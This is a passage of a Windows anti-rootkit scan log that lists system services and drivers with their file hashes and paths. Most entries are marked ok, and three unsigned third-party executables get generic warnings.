23:13:10.0188 3596 [ 5EC68164E14D25675C98BBB5F09E8606 ] BasicRender C:\WINDOWS\System32\drivers\BasicRender.sys
23:13:10.0197 3596 BasicRender - ok
23:13:10.0230 3596 [ 89143A7BA7850F5C7E61B43BB44B6418 ] BDESVC C:\WINDOWS\System32\bdesvc.dll
23:13:10.0253 3596 BDESVC - ok
23:13:10.0263 3596 [ 9E7AEA59776D904607985AFFE7E5E183 ] Beep C:\WINDOWS\system32\drivers\Beep.sys
23:13:10.0272 3596 Beep - ok
23:13:10.0301 3596 [ 9E6A544F465C582AB42444A217CF04DC ] BFE C:\WINDOWS\System32\bfe.dll
23:13:10.0318 3596 BFE - ok
23:13:10.0424 3596 [ D598C44A7072D3108D8D8102EC5E07F7 ] BITS C:\WINDOWS\System32\qmgr.dll
23:13:10.0440 3596 BITS - ok
23:13:10.0512 3596 [ EBBCD5DFBB1DE70E8F4AF8FA59E401FD ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
23:13:10.0521 3596 Bonjour Service - ok
23:13:10.0535 3596 [ B17AC10B47C7FCB44D22A1F06415840E ] bowser C:\WINDOWS\system32\DRIVERS\bowser.sys
23:13:10.0553 3596 bowser - ok
23:13:10.0584 3596 [ 975398A3D2C1FEA73FC93931978DF354 ] BrokerInfrastructure C:\WINDOWS\System32\bisrv.dll
23:13:10.0603 3596 BrokerInfrastructure - ok
23:13:10.0617 3596 [ 310068BDA80B1D55C36580FD8A873FAF ] Browser C:\WINDOWS\System32\browser.dll
23:13:10.0628 3596 Browser - ok
23:13:10.0649 3596 [ 3AA4309EBD9491E516F13FE3DC752FEE ] BthAvrcpTg C:\WINDOWS\System32\drivers\BthAvrcpTg.sys
23:13:10.0663 3596 BthAvrcpTg - ok
23:13:10.0681 3596 [ 616EB8748C988AEE98D93DA141C3D3B4 ] BthHFEnum C:\WINDOWS\System32\drivers\bthhfenum.sys
23:13:10.0697 3596 BthHFEnum - ok
23:13:10.0708 3596 [ DCB4EBD928A6FB368BE6CAE522412DE1 ] bthhfhid C:\WINDOWS\System32\drivers\BthHFHid.sys
23:13:10.0716 3596 bthhfhid - ok
23:13:10.0744 3596 [ 033916CE8784A848B9A3D686B7F66D97 ] BTHMODEM C:\WINDOWS\System32\drivers\bthmodem.sys
23:13:10.0771 3596 BTHMODEM - ok
23:13:10.0789 3596 [ A4387C3D271959313E2577DB7BE8BA7A ] bthserv C:\WINDOWS\system32\bthserv.dll
23:13:10.0799 3596 bthserv - ok
23:13:10.0815 3596 [ 990B1BABE6E81FB18E65A87EBEFB1772 ] cdfs C:\WINDOWS\system32\DRIVERS\cdfs.sys
23:13:10.0828 3596 cdfs - ok
23:13:10.0847 3596 [ 339BFF85D788268752DA8C9644B188EE ] cdrom C:\WINDOWS\System32\drivers\cdrom.sys
23:13:10.0858 3596 cdrom - ok
23:13:10.0864 3596 [ BAF8F0F55BC300E5F882E521F054E345 ] CertPropSvc C:\WINDOWS\System32\certprop.dll
23:13:10.0876 3596 CertPropSvc - ok
23:13:10.0888 3596 [ F64B7D1A37CC1D5F421D5359EEC81E2E ] circlass C:\WINDOWS\System32\drivers\circlass.sys
23:13:10.0905 3596 circlass - ok
23:13:10.0958 3596 [ 9905168708DB68849B879B5548F68AB3 ] CLFS C:\WINDOWS\system32\drivers\CLFS.sys
23:13:10.0987 3596 CLFS - ok
23:13:11.0013 3596 [ 2DC8538A2260647484A6C921CA837313 ] CmBatt C:\WINDOWS\System32\drivers\CmBatt.sys
23:13:11.0021 3596 CmBatt - ok
23:13:11.0058 3596 [ E708BFF0473EC6B271EA46B65B16CA56 ] CNG C:\WINDOWS\system32\Drivers\cng.sys
23:13:11.0077 3596 CNG - ok
23:13:11.0175 3596 [ 6FACA9C62024E14251C7ED33A8E8B660 ] CodeMeter.exe C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
23:13:11.0204 3596 CodeMeter.exe - ok
23:13:11.0243 3596 [ 0E5B1E9E7122EDAAF1F6CE047965CA92 ] CompositeBus C:\WINDOWS\System32\drivers\CompositeBus.sys
23:13:11.0259 3596 CompositeBus - ok
23:13:11.0264 3596 COMSysApp - ok
23:13:11.0284 3596 [ D9CB0782AF819548072AA45B70F8B22D ] condrv C:\WINDOWS\system32\drivers\condrv.sys
23:13:11.0303 3596 condrv - ok
23:13:11.0323 3596 [ F0E78B119D12BA81F163D48C0FF30B9A ] CryptSvc C:\WINDOWS\system32\cryptsvc.dll
23:13:11.0333 3596 CryptSvc - ok
23:13:11.0365 3596 [ F2C69C3D98249DE14D4B2832516D4FD5 ] CSC C:\WINDOWS\system32\drivers\csc.sys
23:13:11.0380 3596 CSC - ok
23:13:11.0403 3596 [ 22CCB6AFF617AAC6121DF6CDA5ABF3F4 ] CscService C:\WINDOWS\System32\cscsvc.dll
23:13:11.0428 3596 CscService - ok
23:13:11.0463 3596 [ C4D01BD86D6B207275FC143EEA951D75 ] dam C:\WINDOWS\system32\drivers\dam.sys
23:13:11.0472 3596 dam - ok
23:13:11.0517 3596 [ 1EC6E533C954BDDF2A37E7851A7E58FD ] DcomLaunch C:\WINDOWS\system32\rpcss.dll
23:13:11.0532 3596 DcomLaunch - ok
23:13:11.0551 3596 [ C8650D1F61149AA546BDBC99172EBBC1 ] defragsvc C:\WINDOWS\System32\defragsvc.dll
23:13:11.0572 3596 defragsvc - ok
23:13:11.0588 3596 [ 5EAEF67AE2AF4D2DC664B649DB7B2E16 ] DeviceAssociationService C:\WINDOWS\system32\das.dll
23:13:11.0605 3596 DeviceAssociationService - ok
23:13:11.0638 3596 [ 799BE46D45D486704CE0F37CA5385262 ] DeviceInstall C:\WINDOWS\system32\umpnpmgr.dll
23:13:11.0648 3596 DeviceInstall - ok
23:13:11.0664 3596 [ 09D9EB9E7898F8E6561473A20CC808B9 ] Dfsc C:\WINDOWS\system32\Drivers\dfsc.sys
23:13:11.0674 3596 Dfsc - ok
23:13:11.0703 3596 [ B9430166FEB246F6070A62B3554932C9 ] dg_ssudbus C:\WINDOWS\system32\DRIVERS\ssudbus.sys
23:13:11.0715 3596 dg_ssudbus - ok
23:13:11.0754 3596 [ 9E0E72222264745ADEB0E5AC680B0ED6 ] Dhcp C:\WINDOWS\system32\dhcpcore.dll
23:13:11.0781 3596 Dhcp - ok
23:13:11.0798 3596 [ 3C736FAE17BA6F91BA37594AAB139CD0 ] discache C:\WINDOWS\system32\drivers\discache.sys
23:13:11.0811 3596 discache - ok
23:13:11.0825 3596 [ 560495FF4CA22E1D9B1972FA18F43B6F ] disk C:\WINDOWS\system32\drivers\disk.sys
23:13:11.0834 3596 disk - ok
23:13:11.0857 3596 [ 82A7C72593793FE1EADA7A305BD1567A ] dmvsc C:\WINDOWS\System32\drivers\dmvsc.sys
23:13:11.0878 3596 dmvsc - ok
23:13:11.0911 3596 [ 066B9710B36AB550E01EEFCA52155968 ] Dnscache C:\WINDOWS\System32\dnsrslvr.dll
23:13:11.0922 3596 Dnscache - ok
23:13:11.0935 3596 [ 9949AD2ABA168A618D46C799D6CC898C ] dot3svc C:\WINDOWS\System32\dot3svc.dll
23:13:11.0949 3596 dot3svc - ok
23:13:11.0981 3596 [ 109FC3F80BF4F4DC5A071058074F13C1 ] DPS C:\WINDOWS\system32\dps.dll
23:13:11.0997 3596 DPS - ok
23:13:12.0029 3596 [ 9C7C183F937951AE17C5B8B3259CF3FF ] drmkaud C:\WINDOWS\system32\drivers\drmkaud.sys
23:13:12.0037 3596 drmkaud - ok
23:13:12.0056 3596 [ BF48F32EE248C3D371DA5DC93BBEADA7 ] DsmSvc C:\WINDOWS\System32\DeviceSetupManager.dll
23:13:12.0069 3596 DsmSvc - ok
23:13:12.0114 3596 [ ED120AA770A78B5079F8C7BB5AF8A035 ] DXGKrnl C:\WINDOWS\System32\drivers\dxgkrnl.sys
23:13:12.0156 3596 DXGKrnl - ok
23:13:12.0161 3596 [ 58BA473DD88F5FC1932282BA683AA03E ] Eaphost C:\WINDOWS\System32\eapsvc.dll
23:13:12.0175 3596 Eaphost - ok
23:13:12.0287 3596 [ 5AB97B3282D7D6114949D1EB5C8598E4 ] ebdrv C:\WINDOWS\system32\drivers\evbda.sys
23:13:12.0353 3596 ebdrv - ok
23:13:12.0392 3596 [ F702AB6181513303AB0FC8D59E52708B ] EFS C:\WINDOWS\System32\lsass.exe
23:13:12.0401 3596 EFS - ok
23:13:12.0407 3596 [ 66D60BD9A4C05616ABECA2A901475098 ] EhStorClass C:\WINDOWS\system32\drivers\EhStorClass.sys
23:13:12.0417 3596 EhStorClass - ok
23:13:12.0434 3596 [ A61D0F543024E458C0FE32352E1978E2 ] EhStorTcgDrv C:\WINDOWS\system32\drivers\EhStorTcgDrv.sys
23:13:12.0444 3596 EhStorTcgDrv - ok
23:13:12.0454 3596 [ D790D058D67582DB9C84C2D33695FE6B ] ErrDev C:\WINDOWS\System32\drivers\errdev.sys
23:13:12.0463 3596 ErrDev - ok
23:13:12.0504 3596 [ F9E01C2D9F8BC049E04CF5DC24A5F638 ] EventSystem C:\WINDOWS\system32\es.dll
23:13:12.0517 3596 EventSystem - ok
23:13:12.0532 3596 [ 7A4D6FEB8C52B3FE855E4DCDF9107E03 ] exfat C:\WINDOWS\system32\drivers\exfat.sys
23:13:12.0548 3596 exfat - ok
23:13:12.0577 3596 Fabs - ok
23:13:12.0595 3596 [ 60996602A7111FD2D086E803F33E4282 ] fastfat C:\WINDOWS\system32\drivers\fastfat.sys
23:13:12.0607 3596 fastfat - ok
23:13:12.0709 3596 [ F0E7F8382ED5E138B0DFA4CB5058BCFE ] Fax C:\WINDOWS\system32\fxssvc.exe
23:13:12.0741 3596 Fax - ok
23:13:12.0766 3596 [ 73B2D11DF0B6E03A0CB0323218ACB3E4 ] fdc C:\WINDOWS\System32\drivers\fdc.sys
23:13:12.0776 3596 fdc - ok
23:13:12.0811 3596 [ 0828E3E7BD77C89149EAD3232BFD38DB ] fdPHost C:\WINDOWS\system32\fdPHost.dll
23:13:12.0824 3596 fdPHost - ok
23:13:12.0836 3596 [ 872506AAB591E8908DF4461475AF92DF ] FDResPub C:\WINDOWS\system32\fdrespub.dll
23:13:12.0850 3596 FDResPub - ok
23:13:12.0881 3596 [ 0588950D93A426F97C7AAADB1A9B0458 ] fhsvc C:\WINDOWS\system32\fhsvc.dll
23:13:12.0899 3596 fhsvc - ok
23:13:12.0913 3596 [ 88A9EBACD1058ABB237A6B4E96E7F397 ] FileInfo C:\WINDOWS\system32\drivers\fileinfo.sys
23:13:12.0922 3596 FileInfo - ok
23:13:12.0936 3596 [ 9E4EE3A0B00FF7D5F42A4AF9744CBA02 ] Filetrace C:\WINDOWS\system32\drivers\filetrace.sys
23:13:12.0950 3596 Filetrace - ok
23:13:13.0020 3596 [ 5BD96D8C5411ACE71A7EAACAF0EF2903 ] FirebirdServerMAGIXInstance C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe
23:13:13.0058 3596 FirebirdServerMAGIXInstance ( UnsignedFile.Multi.Generic ) - warning
23:13:13.0058 3596 FirebirdServerMAGIXInstance - detected UnsignedFile.Multi.Generic (1)
23:13:13.0078 3596 [ B1D4C168FF7B8579E3745888658FFB1D ] flpydisk C:\WINDOWS\System32\drivers\flpydisk.sys
23:13:13.0087 3596 flpydisk - ok
23:13:13.0161 3596 [ B33EC133AE4E6C1881D2302D93D2467D ] FltMgr C:\WINDOWS\system32\drivers\fltmgr.sys
23:13:13.0180 3596 FltMgr - ok
23:13:13.0232 3596 [ 0BCDC0FF11B984162B0CF0FF6E9E0146 ] FontCache C:\WINDOWS\system32\FntCache.dll
23:13:13.0262 3596 FontCache - ok
23:13:13.0316 3596 [ 0B56259F5611787222A04A8F254E51D4 ] FontCache3.0.0.0 C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
23:13:13.0323 3596 FontCache3.0.0.0 - ok
23:13:13.0337 3596 [ A5F7873A39E4E9FAAAE59B7E9E36B705 ] FsDepends C:\WINDOWS\system32\drivers\FsDepends.sys
23:13:13.0346 3596 FsDepends - ok
23:13:13.0353 3596 [ A6DD7D491F587F4BC13FB972977DC8E8 ] Fs_Rec C:\WINDOWS\system32\drivers\Fs_Rec.sys
23:13:13.0362 3596 Fs_Rec - ok
23:13:13.0403 3596 [ FA228F4BB10DC7ED7E7D131C034E2331 ] fvevol C:\WINDOWS\system32\DRIVERS\fvevol.sys
23:13:13.0421 3596 fvevol - ok
23:13:13.0453 3596 [ A969D92973DFA895E7776B4BFE36DBB2 ] FxPPM C:\WINDOWS\System32\drivers\fxppm.sys
23:13:13.0462 3596 FxPPM - ok
23:13:13.0491 3596 [ 52BC441E07A827EBAB70CDC7EAEDB28D ] gagp30kx C:\WINDOWS\system32\drivers\gagp30kx.sys
23:13:13.0501 3596 gagp30kx - ok
23:13:13.0532 3596 [ 8E98D21EE06192492A5671A6144D092F ] GEARAspiWDM C:\WINDOWS\system32\DRIVERS\GEARAspiWDM.sys
23:13:13.0538 3596 GEARAspiWDM - ok
23:13:13.0566 3596 [ 721F8EEF5E9747F32670DEFF7FB92541 ] gencounter C:\WINDOWS\System32\drivers\vmgencounter.sys
23:13:13.0574 3596 gencounter - ok
23:13:13.0593 3596 [ CA18ECFCFFDD638ECE80799A9056B238 ] GPIOClx0101 C:\WINDOWS\system32\Drivers\msgpioclx.sys
23:13:13.0603 3596 GPIOClx0101 - ok
23:13:13.0631 3596 [ 5358678C6370F2ADC5291849F6503262 ] gpsvc C:\WINDOWS\System32\gpsvc.dll
23:13:13.0657 3596 gpsvc - ok
23:13:13.0718 3596 [ F02A533F517EB38333CB12A9E8963773 ] gupdate C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
23:13:13.0725 3596 gupdate - ok
23:13:13.0729 3596 [ F02A533F517EB38333CB12A9E8963773 ] gupdatem C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
23:13:13.0736 3596 gupdatem - ok
23:13:13.0765 3596 [ 7D87B5B6C7188D553E11B59DC7F0B111 ] HDAudBus C:\WINDOWS\System32\drivers\HDAudBus.sys
23:13:13.0782 3596 HDAudBus - ok
23:13:13.0794 3596 [ 3F76BBA53D65E85A7F53E7A71082082C ] HidBatt C:\WINDOWS\System32\drivers\HidBatt.sys
23:13:13.0802 3596 HidBatt - ok
23:13:13.0817 3596 [ A25BAE8C1F2830C8E5625EC7E4E968BE ] HidBth C:\WINDOWS\System32\drivers\hidbth.sys
23:13:13.0833 3596 HidBth - ok
23:13:13.0869 3596 [ CC4A07E51D89575CAB6F4EB590D87CD4 ] hidi2c C:\WINDOWS\System32\drivers\hidi2c.sys
23:13:13.0889 3596 hidi2c - ok
23:13:13.0907 3596 [ DC96F7DACB777CDEAEF9958A50BFDA06 ] HidIr C:\WINDOWS\System32\drivers\hidir.sys
23:13:13.0923 3596 HidIr - ok
23:13:13.0960 3596 [ FAC37D7B3D6354A5A5E19A45B50B4008 ] hidserv C:\WINDOWS\system32\hidserv.dll
23:13:13.0970 3596 hidserv - ok
23:13:13.0984 3596 [ 590B6F71BCDA4368B4BF7D8DF22B60F7 ] HidUsb C:\WINDOWS\System32\drivers\hidusb.sys
23:13:14.0004 3596 HidUsb - ok
23:13:14.0055 3596 [ 43F884B61A24377567CD0FEB35236334 ] hkmsvc C:\WINDOWS\system32\kmsvc.dll
23:13:14.0068 3596 hkmsvc - ok
23:13:14.0101 3596 [ 33DFC14DFDCCFA7AA10E392F6A8EC1CF ] HomeGroupListener C:\WINDOWS\system32\ListSvc.dll
23:13:14.0137 3596 HomeGroupListener - ok
23:13:14.0176 3596 [ E0D9F6FE18FA7F53ADD29AF719CE2B7E ] HomeGroupProvider C:\WINDOWS\system32\provsvc.dll
23:13:14.0201 3596 HomeGroupProvider - ok
23:13:14.0215 3596 [ 64DB7A8D97CA53DCCF93D0A1E08342CF ] HpSAMD C:\WINDOWS\system32\drivers\HpSAMD.sys
23:13:14.0224 3596 HpSAMD - ok
23:13:14.0261 3596 [ 29CB98187BB5711F7759540976D295FC ] HTTP C:\WINDOWS\system32\drivers\HTTP.sys
23:13:14.0291 3596 HTTP - ok
23:13:14.0308 3596 [ 2A98301068801700906C06649860FE94 ] hwpolicy C:\WINDOWS\system32\drivers\hwpolicy.sys
23:13:14.0317 3596 hwpolicy - ok
23:13:14.0329 3596 [ DC76901D82097C9E297F20C287CB9A27 ] hyperkbd C:\WINDOWS\System32\drivers\hyperkbd.sys
23:13:14.0336 3596 hyperkbd - ok
23:13:14.0352 3596 [ 716413AB3CA12DE0A7222D28C1C9352C ] HyperVideo C:\WINDOWS\system32\DRIVERS\HyperVideo.sys
23:13:14.0360 3596 HyperVideo - ok
23:13:14.0378 3596 [ C9E9CBF73AFFBFE3E801EFB516787BA3 ] i8042prt C:\WINDOWS\System32\drivers\i8042prt.sys
23:13:14.0388 3596 i8042prt - ok
23:13:14.0409 3596 [ 5E394EBD26FD68AA9300332C46BEDD62 ] iaStorV C:\WINDOWS\system32\drivers\iaStorV.sys
23:13:14.0425 3596 iaStorV - ok
23:13:14.0467 3596 [ 1CF03C69B49ACB70C722DF92755C0C8C ] IDriverT C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
23:13:14.0472 3596 IDriverT ( UnsignedFile.Multi.Generic ) - warning
23:13:14.0472 3596 IDriverT - detected UnsignedFile.Multi.Generic (1)
23:13:14.0488 3596 [ 24847A06B84339FEEDE5CABF3D27D320 ] iirsp C:\WINDOWS\system32\drivers\iirsp.sys
23:13:14.0497 3596 iirsp - ok
23:13:14.0526 3596 [ 531B5A98145DA689741A0AC18F14EA94 ] IKEEXT C:\WINDOWS\System32\ikeext.dll
23:13:14.0561 3596 IKEEXT - ok
23:13:14.0581 3596 [ 4F37726CF764CA18A8A84F85EF3A7F24 ] intelide C:\WINDOWS\system32\drivers\intelide.sys
23:13:14.0590 3596 intelide - ok
23:13:14.0605 3596 [ E15CDF68DD73423F15D4AC404793AF0D ] intelppm C:\WINDOWS\System32\drivers\intelppm.sys
23:13:14.0615 3596 intelppm - ok
23:13:14.0633 3596 [ 8FCA66234A0933D796BB780B7953BAB9 ] IpFilterDriver C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
23:13:14.0645 3596 IpFilterDriver - ok
23:13:14.0685 3596 [ C217B8D2E58C57A319B16125C3D4B69C ] iphlpsvc C:\WINDOWS\System32\iphlpsvc.dll
23:13:14.0705 3596 iphlpsvc - ok
23:13:14.0715 3596 [ 6E98A046A12AA113F8898AA5D612BD6E ] IPMIDRV C:\WINDOWS\System32\drivers\IPMIDrv.sys
23:13:14.0732 3596 IPMIDRV - ok
23:13:14.0752 3596 [ 3969B9C218DD3FAA9F4ED2FFC3651C02 ] IPNAT C:\WINDOWS\system32\drivers\ipnat.sys
23:13:14.0764 3596 IPNAT - ok
23:13:14.0808 3596 [ 0F261EC4F514926177C70C1832374231 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
23:13:14.0824 3596 iPod Service - ok
23:13:14.0844 3596 [ 25CD7C4BB2863FFC2B0B311F0AEBF77C ] IRENUM C:\WINDOWS\system32\drivers\irenum.sys
23:13:14.0854 3596 IRENUM - ok
23:13:14.0867 3596 [ D940C5BB9DC92E588533C19ABCC3D2C2 ] isapnp C:\WINDOWS\system32\drivers\isapnp.sys
23:13:14.0876 3596 isapnp - ok
23:13:14.0910 3596 [ 69C8BF0BC2B0EA10F130F4D3104DC2EF ] iScsiPrt C:\WINDOWS\System32\drivers\msiscsi.sys
23:13:14.0923 3596 iScsiPrt - ok
23:13:14.0939 3596 [ 8FBD94B69D6423E20ABCD59D86368B21 ] kbdclass C:\WINDOWS\System32\drivers\kbdclass.sys
23:13:14.0949 3596 kbdclass - ok
23:13:14.0958 3596 [ E88C932ABDF8185A62C8F2FC7B051FB6 ] kbdhid C:\WINDOWS\System32\drivers\kbdhid.sys
23:13:14.0967 3596 kbdhid - ok
23:13:14.0976 3596 [ FB6C185092E18011EF49989425C2AA87 ] kdnic C:\WINDOWS\system32\DRIVERS\kdnic.sys
23:13:14.0985 3596 kdnic - ok
23:13:15.0000 3596 [ F702AB6181513303AB0FC8D59E52708B ] KeyIso C:\WINDOWS\system32\lsass.exe
23:13:15.0009 3596 KeyIso - ok
23:13:15.0033 3596 [ 8B5219318DF5895ABD230C373F2DF18A ] kl1 C:\WINDOWS\system32\DRIVERS\kl1.sys
23:13:15.0046 3596 kl1 - ok
23:13:15.0061 3596 [ F2EB9202FCCC81E0902D3C5A70037A44 ] klelam C:\WINDOWS\system32\DRIVERS\klelam.sys
23:13:15.0071 3596 klelam - ok
23:13:15.0109 3596 [ 5D0104D068AA740A4CD75158652EA986 ] KLIF C:\WINDOWS\system32\DRIVERS\klif.sys
23:13:15.0124 3596 KLIF - ok
23:13:15.0137 3596 [ 1B5B924D27399F41DECD1CC6D706429F ] KLIM6 C:\WINDOWS\system32\DRIVERS\klim6.sys
23:13:15.0143 3596 KLIM6 - ok
23:13:15.0175 3596 [ A0B1AE842D7C7F2FDF530A7049CB988D ] klkbdflt C:\WINDOWS\system32\DRIVERS\klkbdflt.sys
23:13:15.0180 3596 klkbdflt - ok
23:13:15.0193 3596 [ A8FFD74947077D8BD9A80936EC24514D ] klmouflt C:\WINDOWS\system32\DRIVERS\klmouflt.sys
23:13:15.0198 3596 klmouflt - ok
23:13:15.0214 3596 [ FE0F2B2F8B0EA185B572BD3082593600 ] klwfp C:\WINDOWS\system32\DRIVERS\klwfp.sys
23:13:15.0228 3596 klwfp - ok
23:13:15.0233 3596 KMService - ok
23:13:15.0245 3596 [ 185D21CB8F10CFB351FF65DA88C18BC9 ] kneps C:\WINDOWS\system32\DRIVERS\kneps.sys
23:13:15.0254 3596 kneps - ok
23:13:15.0293 3596 [ DFA480F6DED551464F3A5B959F437800 ] KSecDD C:\WINDOWS\system32\Drivers\ksecdd.sys
23:13:15.0331 3596 KSecDD - ok
23:13:15.0366 3596 [ 127FB0AAD232BAAD2C9BBACD374F4FC5 ] KSecPkg C:\WINDOWS\system32\Drivers\ksecpkg.sys
23:13:15.0378 3596 KSecPkg - ok
23:13:15.0394 3596 [ 81492FEEBF2F26455B00EE8DBAE8A1B0 ] ksthunk C:\WINDOWS\system32\drivers\ksthunk.sys
23:13:15.0404 3596 ksthunk - ok
23:13:15.0436 3596 [ 5825DBACEDC3812B5CF8D40B997BF210 ] KtmRm C:\WINDOWS\system32\msdtckrm.dll
23:13:15.0451 3596 KtmRm - ok
23:13:15.0485 3596 [ 256EE31588257E8A555DBFAA13F1908E ] LanmanServer C:\WINDOWS\system32\srvsvc.dll
23:13:15.0509 3596 LanmanServer - ok
23:13:15.0536 3596 [ 16650912BE5A94B40E0B3B4C39652B56 ] LanmanWorkstation C:\WINDOWS\System32\wkssvc.dll
23:13:15.0550 3596 LanmanWorkstation - ok
23:13:15.0622 3596 [ EE963D96BFD97E54BA6CE6D2AC58DE35 ] LightScribeService C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
23:13:15.0625 3596 LightScribeService ( UnsignedFile.Multi.Generic ) - warning
23:13:15.0625 3596 LightScribeService - detected UnsignedFile.Multi.Generic (1)
23:13:15.0636 3596 [ CEEFD29FC551F289810B0B9381B321DC ] lltdio C:\WINDOWS\system32\DRIVERS\lltdio.sys
23:13:15.0648 3596 lltdio - ok
23:13:15.0679 3596 [ BCF53485E0A94722CDE3C4A93CD8EB8C ] lltdsvc C:\WINDOWS\System32\lltdsvc.dll
23:13:15.0694 3596 lltdsvc - ok
23:13:15.0729 3596 [ 5A2F7F1CBC2E631A497DAD16164E06D2 ] lmhosts C:\WINDOWS\System32\lmhsvc.dll
23:13:15.0748 3596 lmhosts - ok
23:13:15.0791 3596 [ 022CDD12161B063D7852B1075BF3FFF2 ] LSI_SAS C:\WINDOWS\system32\drivers\lsi_sas.sys
23:13:15.0807 3596 LSI_SAS - ok
23:13:15.0820 3596 [ 07AD59D669B996F29F91817F0ECFA34F ] LSI_SAS2 C:\WINDOWS\system32\drivers\lsi_sas2.sys
23:13:15.0831 3596 LSI_SAS2 - ok
23:13:15.0849 3596 [ 216FB796AA4E252ACCE93B1BCB80B5EC ] LSI_SCSI C:\WINDOWS\system32\drivers\lsi_scsi.sys
23:13:15.0859 3596 LSI_SCSI - ok
23:13:15.0877 3596 [ 5E80530AF37102488EE980B4A92AF99F ] LSI_SSS C:\WINDOWS\system32\drivers\lsi_sss.sys
23:13:15.0887 3596 LSI_SSS - ok
23:13:15.0921 3596 [ A57BA284F5996FFD32DCDBC41A4657DB ] LSM C:\WINDOWS\System32\lsm.dll
23:13:15.0944 3596 LSM - ok
23:13:15.0978 3596 [ 2BDC5D711FA61307CE6190D47C956368 ] luafv C:\WINDOWS\system32\drivers\luafv.sys
23:13:15.0993 3596 luafv - ok
23:13:16.0031 3596 [ A0A527569856B9814E8920F52EBB67F5 ] LVRS64 C:\WINDOWS\system32\DRIVERS\lvrs64.sys
23:13:16.0043 3596 LVRS64 - ok
23:13:16.0129 3596 [ 415E344294D1C0D04627B29146F68481 ] LVUVC64 C:\WINDOWS\system32\DRIVERS\lvuvc64.sys
23:13:16.0202 3596 LVUVC64 - ok
23:13:16.0227 3596 [ 9B0D829C3BE4E7472DB9DD2B79908E3C ] megasas C:\WINDOWS\system32\drivers\megasas.sys
23:13:16.0242 3596 megasas - ok
23:13:16.0260 3596 [ ECC3F54C7AFC318271C4F0B4606D8DB0 ] MegaSR C:\WINDOWS\system32\drivers\MegaSR.sys
23:13:16.0276 3596 MegaSR - ok
23:13:16.0327 3596 Microsoft SharePoint Workspace Audit Service - ok
23:13:16.0363 3596 [ EEE908BE7143FCA48CF0CB87214E2AB8 ] MMCSS C:\WINDOWS\system32\mmcss.dll
23:13:16.0381 3596 MMCSS - ok
23:13:16.0399 3596 [ 780098AD5DA8A4822E2563984C85EF7B ] Modem C:\WINDOWS\system32\drivers\modem.sys
23:13:16.0410 3596 Modem - ok
23:13:16.0428 3596 [ 83EB0BF7E6EBD5B1AAC97F9DBD5EB935 ] monitor C:\WINDOWS\system32\DRIVERS\monitor.sys
23:13:16.0437 3596 monitor - ok
23:13:16.0453 3596 [ 618446B98C79776654340CE27C73485E ] mouclass C:\WINDOWS\System32\drivers\mouclass.sys
23:13:16.0462 3596 mouclass - ok
23:13:16.0474 3596 [ CB2527B8B87D83E56FBF3944BBB6F606 ] mouhid C:\WINDOWS\System32\drivers\mouhid.sys
23:13:16.0483 3596 mouhid - ok
23:13:16.0505 3596 [ 89D263DBF08119CE16273991C120D6DD ] mountmgr C:\WINDOWS\system32\drivers\mountmgr.sys
23:13:16.0523 3596 mountmgr - ok
23:13:16.0611 3596 [ 51A84B690DF519DCF656F780243D953E ] MozillaMaintenance C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
23:13:16.0619 3596 MozillaMaintenance - ok
23:13:16.0665 3596 [ 0D1609DD82C7440F5D5BF21A9D4D5C0C ] mpsdrv C:\WINDOWS\system32\drivers\mpsdrv.sys
23:13:16.0699 3596 mpsdrv - ok
23:13:16.0741 3596 [ 3031573A739DBEE8923851929D0AF423 ] MpsSvc C:\WINDOWS\system32\mpssvc.dll
23:13:16.0761 3596 MpsSvc - ok
23:13:16.0797 3596 [ 866AF645A3B1F4358C4201CE089839EA ] MQAC C:\WINDOWS\system32\drivers\mqac.sys
23:13:16.0808 3596 MQAC - ok
23:13:16.0824 3596 [ 3D70147F55F1EC84EB9139ED7FFE48BC ] MRxDAV C:\WINDOWS\system32\drivers\mrxdav.sys
23:13:16.0835 3596 MRxDAV - ok
23:13:16.0888 3596 [ 877D60D6E4156EC4A2E0B6871D41BED9 ] mrxsmb C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
23:13:16.0913 3596 mrxsmb - ok
23:13:16.0942 3596 [ 06D5F2FA3C61E8EA91648EA8E9F99FD3 ] mrxsmb10 C:\WINDOWS\system32\DRIVERS\mrxsmb10.sys
23:13:16.0954 3596 mrxsmb10 - ok
23:13:16.0967 3596 [ E078446D4B8622AA6030C7B8A1A08962 ] mrxsmb20 C:\WINDOWS\system32\DRIVERS\mrxsmb20.sys
23:13:16.0977 3596 mrxsmb20 - ok
23:13:17.0016 3596 [ 98487487D6B3797CA927E9D7B030AE13 ] MsBridge C:\WINDOWS\system32\DRIVERS\bridge.sys
23:13:17.0029 3596 MsBridge - ok
23:13:17.0060 3596 [ 4A07458EB4F17573BD39F22029A991C1 ] MSDTC C:\WINDOWS\System32\msdtc.exe
23:13:17.0071 3596 MSDTC - ok
23:13:17.0088 3596 [ 3886F1F2A4D2900ABAA7E4486BEEE6A2 ] Msfs C:\WINDOWS\system32\drivers\Msfs.sys
23:13:17.0098 3596 Msfs - ok
23:13:17.0130 3596 [ C32A7A39B960A42BA9D4FBE47213CA03 ] msgpiowin32 C:\WINDOWS\System32\drivers\msgpiowin32.sys
23:13:17.0138 3596 msgpiowin32 - ok
23:13:17.0150 3596 [ D3857A767B91A061B408CCAB02DA4F40 ] mshidkmdf C:\WINDOWS\System32\drivers\mshidkmdf.sys
23:13:17.0159 3596 mshidkmdf - ok
23:13:17.0164 3596 [ 839B48910FB1E887635C48F3EC11A05E ] mshidumdf C:\WINDOWS\System32\drivers\mshidumdf.sys
23:13:17.0174 3596 mshidumdf - ok
23:13:17.0195 3596 [ 55C0DB741E3AB7463242B185B1C2997C ] msisadrv C:\WINDOWS\system32\drivers\msisadrv.sys
23:13:17.0203 3596 msisadrv - ok
23:13:17.0230 3596 [ 216C6B035A4BA5560E1255BD8E5BB89F ] MSiSCSI C:\WINDOWS\system32\iscsiexe.dll
23:13:17.0241 3596 MSiSCSI - ok
23:13:17.0246 3596 msiserver - ok
